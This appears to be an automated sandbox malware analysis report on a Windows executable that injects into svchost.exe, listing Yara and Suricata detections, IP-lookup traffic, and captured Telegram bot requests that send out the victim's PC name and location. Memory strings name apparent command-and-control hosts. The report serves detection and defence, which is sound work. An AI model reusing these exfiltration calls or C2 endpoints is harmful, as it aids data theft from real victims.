Yara detected Generic Downloader

Source: Yara match	File source: 8.3.svchost.exe.326d000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.7e90000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.7e00f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.7d30000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.svchost.exe.326df20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.7e00000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.svchost.exe.366ef20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.3774f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.8100000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.svchost.exe.7d30f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.svchost.exe.366e000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:399601%0D%0ADate%20and%20Time:%2003/01/2025%20/%2014:56:37%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20399601%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:399601%0D%0ADate%20and%20Time:%2003/01/2025%20/%2015:16:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20399601%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49733 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49802 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49838 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49710 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49827 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49746 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49797 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49727 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49853 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49768 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49788 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49823 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49874 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49778 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49833 -> 188.114.96.3:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49720 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49812 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\FACT0987789000900.exe

Code function: 3_2_004E4EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

3_2_004E4EB5

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:399601%0D%0ADate%20and%20Time:%2003/01/2025%20/%2014:56:37%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20399601%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:399601%0D%0ADate%20and%20Time:%2003/01/2025%20/%2015:16:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20399601%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 03 Jan 2025 08:21:24 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 03 Jan 2025 08:21:36 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: svchost.exe, 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: svchost.exe, 00000008.00000002.2547584481.0000000005541000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: svchost.exe, 00000008.00000002.2547584481.0000000005541000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: svchost.exe, 00000008.00000002.2547584481.0000000005541000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: svchost.exe, 00000008.00000002.2547584481.0000000005541000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1439914408.0000000007D25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2546302746.000000000367F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: svchost.exe, 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: svchost.exe, 00000008.00000002.2547584481.0000000005541000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: svchost.exe, 00000008.00000002.2547584481.0000000005541000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: svchost.exe, 00000008.00000002.2550139780.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: svchost.exe, 00000008.00000002.2547584481.0000000005628000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005877000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: svchost.exe, 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.2547584481.0000000005628000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005877000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: svchost.exe, 00000008.00000002.2547584481.0000000005628000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005877000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: svchost.exe, 00000008.00000002.2547584481.0000000005628000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005877000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:399601%0D%0ADate%20a
Source: svchost.exe, 00000008.00000002.2550139780.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
